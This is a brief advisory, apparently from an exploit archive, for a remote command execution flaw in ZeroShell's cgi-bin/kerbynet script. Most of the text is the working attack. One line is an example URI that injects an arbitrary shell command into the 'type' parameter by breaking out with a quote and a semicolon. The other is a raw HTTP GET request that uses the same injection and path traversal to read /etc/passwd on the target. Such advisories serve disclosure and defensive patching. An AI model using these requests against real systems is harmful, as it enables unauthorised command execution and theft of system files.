ZeroShell 'cgi-bin/kerbynet' Remote Command Execution Vulnerability

ZeroShell 'cgi-bin/kerbynet' Remote Command Execution Vulnerability

An attacker may exploit this issue via a browser.

The following example URI and request are available:

http://www.example.com/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;[CMD HERE];%22

HTTP request:
GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;
/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22 HTTP/1.1
Host: IP